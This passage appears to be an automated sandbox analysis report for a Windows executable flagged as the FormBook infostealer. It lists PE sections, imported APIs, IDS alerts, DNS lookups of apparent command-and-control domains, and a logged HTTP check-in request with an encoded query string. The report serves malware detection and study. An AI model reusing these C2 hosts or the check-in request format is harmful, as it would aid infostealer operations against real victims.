                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x5c4a0x5e00False0.659906914893617data6.410763775060762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x70000x115e0x1200False0.4466145833333333data5.142548180775325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x90000x1b0780x600False0.455078125data4.2252195571372315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x2d0000x9e00xa00False0.45625data4.509328731926377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x2d1900x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                RT_DIALOG0x2d4780x100dataEnglishUnited States
                                                RT_DIALOG0x2d5780x11cdataEnglishUnited States
                                                RT_DIALOG0x2d6980x60dataEnglishUnited States
                                                RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                                                RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States

                                                Imports

                                                DLLImport
                                                KERNEL32.dllSetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
                                                USER32.dllGetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                192.168.2.4162.214.129.14949699802031453 11/30/22-01:25:33.429382TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.4162.214.129.149
                                                192.168.2.4162.214.129.14949699802031412 11/30/22-01:25:33.429382TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.4162.214.129.149
                                                192.168.2.4206.233.197.13549697802031453 11/30/22-01:25:25.388400TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.4206.233.197.135
                                                192.168.2.4206.233.197.13549697802031412 11/30/22-01:25:25.388400TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.4206.233.197.135
                                                192.168.2.4162.214.129.14949699802031449 11/30/22-01:25:33.429382TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.4162.214.129.149
                                                192.168.2.4206.233.197.13549697802031449 11/30/22-01:25:25.388400TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.4206.233.197.135

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 30, 2022 01:25:17.361155033 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.493072987 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.493242025 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.530616999 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.662348032 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671255112 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671319962 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671411037 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671453953 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671489000 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.671535969 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671556950 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.671602964 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671647072 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671689987 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.671710014 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671755075 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671791077 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671813011 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.671848059 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671983004 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.672039986 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.672449112 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.804025888 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:22.856251001 CET4969680192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:23.108297110 CET8049696206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:23.108417034 CET4969680192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:23.108675003 CET4969680192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:23.360415936 CET8049696206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:23.608623028 CET8049696206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:23.608676910 CET8049696206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:23.608916998 CET4969680192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:24.117248058 CET4969680192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:25.133325100 CET4969780192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:25.388127089 CET8049697206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:25.388283968 CET4969780192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:25.388400078 CET4969780192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:25.642827034 CET8049697206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:25.881593943 CET8049697206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:25.881633997 CET8049697206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:25.881783009 CET4969780192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:25.881913900 CET4969780192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:26.136291027 CET8049697206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:31.058685064 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:31.228578091 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.228790045 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:31.228866100 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:31.398617983 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.398947954 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.398994923 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.399027109 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.399061918 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.399125099 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:31.399125099 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:32.245378971 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.259099007 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.429162025 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.429264069 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.429382086 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.599260092 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.599673986 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.599761009 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.599796057 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.599829912 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.599961996 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.599961996 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.600157022 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.769869089 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:38.800184965 CET4970080192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:39.009787083 CET8049700155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:39.010145903 CET4970080192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:39.010220051 CET4970080192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:39.219959974 CET8049700155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:39.220068932 CET8049700155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:39.220103025 CET8049700155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:39.220248938 CET4970080192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:40.026948929 CET4970080192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.041326046 CET4970180192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.266415119 CET8049701155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:41.267105103 CET4970180192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.267249107 CET4970180192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.493232965 CET8049701155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:41.493326902 CET8049701155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:41.493360043 CET8049701155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:41.493607998 CET4970180192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.512168884 CET4970180192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.737354040 CET8049701155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:54.098124027 CET4970280192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:54.130537033 CET80497022.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:54.130795002 CET4970280192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:54.144684076 CET4970280192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:54.177130938 CET80497022.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:54.177197933 CET80497022.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:54.177283049 CET80497022.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:54.177361965 CET4970280192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:55.156131029 CET4970280192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:56.167906046 CET4970380192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:56.204200029 CET80497032.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:56.204314947 CET4970380192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:56.204452991 CET4970380192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:56.240530968 CET80497032.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:56.240652084 CET80497032.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:56.240700960 CET80497032.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:56.241038084 CET4970380192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:56.241148949 CET4970380192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:56.277314901 CET80497032.57.90.16192.168.2.4
                                                Nov 30, 2022 01:26:01.376106024 CET4970480192.168.2.4192.185.35.86
                                                Nov 30, 2022 01:26:01.498851061 CET8049704192.185.35.86192.168.2.4
                                                Nov 30, 2022 01:26:01.500869989 CET4970480192.168.2.4192.185.35.86
                                                Nov 30, 2022 01:26:01.502938986 CET4970480192.168.2.4192.185.35.86
                                                Nov 30, 2022 01:26:01.625576019 CET8049704192.185.35.86192.168.2.4
                                                Nov 30, 2022 01:26:01.644731998 CET8049704192.185.35.86192.168.2.4
                                                Nov 30, 2022 01:26:01.644866943 CET8049704192.185.35.86192.168.2.4
                                                Nov 30, 2022 01:26:01.645172119 CET4970480192.168.2.4192.185.35.86
                                                Nov 30, 2022 01:26:02.511065960 CET4970480192.168.2.4192.185.35.86
                                                Nov 30, 2022 01:26:03.527179956 CET4970580192.168.2.4192.185.35.86
                                                Nov 30, 2022 01:26:03.649770975 CET8049705192.185.35.86192.168.2.4
                                                Nov 30, 2022 01:26:03.649888039 CET4970580192.168.2.4192.185.35.86
                                                Nov 30, 2022 01:26:03.650060892 CET4970580192.168.2.4192.185.35.86
                                                Nov 30, 2022 01:26:03.772393942 CET8049705192.185.35.86192.168.2.4
                                                Nov 30, 2022 01:26:03.794171095 CET8049705192.185.35.86192.168.2.4
                                                Nov 30, 2022 01:26:03.794229984 CET8049705192.185.35.86192.168.2.4
                                                Nov 30, 2022 01:26:03.794259071 CET8049705192.185.35.86192.168.2.4
                                                Nov 30, 2022 01:26:03.794286013 CET8049705192.185.35.86192.168.2.4
                                                Nov 30, 2022 01:26:03.794404030 CET4970580192.168.2.4192.185.35.86
                                                Nov 30, 2022 01:26:03.794440985 CET4970580192.168.2.4192.185.35.86
                                                Nov 30, 2022 01:26:03.797452927 CET4970580192.168.2.4192.185.35.86
                                                Nov 30, 2022 01:26:03.919734001 CET8049705192.185.35.86192.168.2.4
                                                Nov 30, 2022 01:26:09.030287027 CET4970680192.168.2.4154.22.100.62
                                                Nov 30, 2022 01:26:09.202169895 CET8049706154.22.100.62192.168.2.4
                                                Nov 30, 2022 01:26:09.202311993 CET4970680192.168.2.4154.22.100.62
                                                Nov 30, 2022 01:26:09.202491999 CET4970680192.168.2.4154.22.100.62
                                                Nov 30, 2022 01:26:09.374208927 CET8049706154.22.100.62192.168.2.4
                                                Nov 30, 2022 01:26:09.375113010 CET8049706154.22.100.62192.168.2.4
                                                Nov 30, 2022 01:26:09.375211954 CET8049706154.22.100.62192.168.2.4
                                                Nov 30, 2022 01:26:09.379703999 CET4970680192.168.2.4154.22.100.62
                                                Nov 30, 2022 01:26:10.220904112 CET4970680192.168.2.4154.22.100.62
                                                Nov 30, 2022 01:26:11.265381098 CET4970780192.168.2.4154.22.100.62
                                                Nov 30, 2022 01:26:11.436945915 CET8049707154.22.100.62192.168.2.4
                                                Nov 30, 2022 01:26:11.437160969 CET4970780192.168.2.4154.22.100.62
                                                Nov 30, 2022 01:26:11.437297106 CET4970780192.168.2.4154.22.100.62
                                                Nov 30, 2022 01:26:11.608745098 CET8049707154.22.100.62192.168.2.4
                                                Nov 30, 2022 01:26:11.609244108 CET8049707154.22.100.62192.168.2.4
                                                Nov 30, 2022 01:26:11.609267950 CET8049707154.22.100.62192.168.2.4
                                                Nov 30, 2022 01:26:11.609283924 CET8049707154.22.100.62192.168.2.4
                                                Nov 30, 2022 01:26:11.645857096 CET4970780192.168.2.4154.22.100.62
                                                Nov 30, 2022 01:26:11.646222115 CET4970780192.168.2.4154.22.100.62
                                                Nov 30, 2022 01:26:11.817645073 CET8049707154.22.100.62192.168.2.4

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 30, 2022 01:25:17.332652092 CET5657253192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:17.350507975 CET53565728.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:22.682940006 CET5091153192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:22.855253935 CET53509118.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:30.889216900 CET5968353192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:31.057456017 CET53596838.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:38.630486965 CET6416753192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:38.799020052 CET53641678.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:46.529058933 CET5856553192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:47.344357967 CET53585658.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:48.363827944 CET5223953192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:48.895919085 CET53522398.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:54.045008898 CET5680753192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:54.096646070 CET53568078.8.8.8192.168.2.4
                                                Nov 30, 2022 01:26:01.252393007 CET6100753192.168.2.48.8.8.8
                                                Nov 30, 2022 01:26:01.374481916 CET53610078.8.8.8192.168.2.4
                                                Nov 30, 2022 01:26:08.846963882 CET6068653192.168.2.48.8.8.8
                                                Nov 30, 2022 01:26:09.028095007 CET53606868.8.8.8192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Nov 30, 2022 01:25:17.332652092 CET192.168.2.48.8.8.80xb919Standard query (0)www.eufidelizo.comA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:22.682940006 CET192.168.2.48.8.8.80xf6a5Standard query (0)www.lyonfinancialusa.comA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:30.889216900 CET192.168.2.48.8.8.80xcf4cStandard query (0)www.afterdarksocial.clubA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:38.630486965 CET192.168.2.48.8.8.80xffbeStandard query (0)www.patrickguarte.comA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:46.529058933 CET192.168.2.48.8.8.80xb251Standard query (0)www.19t221013d.tokyoA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:48.363827944 CET192.168.2.48.8.8.80x878eStandard query (0)www.19t221013d.tokyoA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:54.045008898 CET192.168.2.48.8.8.80x55e9Standard query (0)www.brennancorps.infoA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:26:01.252393007 CET192.168.2.48.8.8.80xcecdStandard query (0)www.lopezmodeling.comA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:26:08.846963882 CET192.168.2.48.8.8.80xca60Standard query (0)www.foxwhistle.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Nov 30, 2022 01:25:17.350507975 CET8.8.8.8192.168.2.40xb919No error (0)www.eufidelizo.comeufidelizo.comCNAME (Canonical name)IN (0x0001)false
                                                Nov 30, 2022 01:25:17.350507975 CET8.8.8.8192.168.2.40xb919No error (0)eufidelizo.com192.185.217.47A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:22.855253935 CET8.8.8.8192.168.2.40xf6a5No error (0)www.lyonfinancialusa.com206.233.197.135A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:31.057456017 CET8.8.8.8192.168.2.40xcf4cNo error (0)www.afterdarksocial.club162.214.129.149A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:38.799020052 CET8.8.8.8192.168.2.40xffbeNo error (0)www.patrickguarte.com155.159.61.221A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:47.344357967 CET8.8.8.8192.168.2.40xb251Server failure (2)www.19t221013d.tokyononenoneA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:48.895919085 CET8.8.8.8192.168.2.40x878eServer failure (2)www.19t221013d.tokyononenoneA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:54.096646070 CET8.8.8.8192.168.2.40x55e9No error (0)www.brennancorps.infobrennancorps.infoCNAME (Canonical name)IN (0x0001)false
                                                Nov 30, 2022 01:25:54.096646070 CET8.8.8.8192.168.2.40x55e9No error (0)brennancorps.info2.57.90.16A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:26:01.374481916 CET8.8.8.8192.168.2.40xcecdNo error (0)www.lopezmodeling.comlopezmodeling.comCNAME (Canonical name)IN (0x0001)false
                                                Nov 30, 2022 01:26:01.374481916 CET8.8.8.8192.168.2.40xcecdNo error (0)lopezmodeling.com192.185.35.86A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:26:09.028095007 CET8.8.8.8192.168.2.40xca60No error (0)www.foxwhistle.com154.22.100.62A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • www.eufidelizo.com
                                                • www.lyonfinancialusa.com
                                                • www.afterdarksocial.club
                                                • www.patrickguarte.com
                                                • www.brennancorps.info
                                                • www.lopezmodeling.com
                                                • www.foxwhistle.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.449695192.185.217.4780C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:25:17.530616999 CET92OUTGET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.eufidelizo.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:25:17.671255112 CET93INHTTP/1.1 404 Not Found
                                                Date: Wed, 30 Nov 2022 00:25:17 GMT
                                                Server: Apache
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Last-Modified: Thu, 29 Sep 2022 21:55:23 GMT
                                                Accept-Ranges: bytes
                                                Content-Length: 11816
                                                Vary: Accept-Encoding
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 67 61 74 6f 72 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 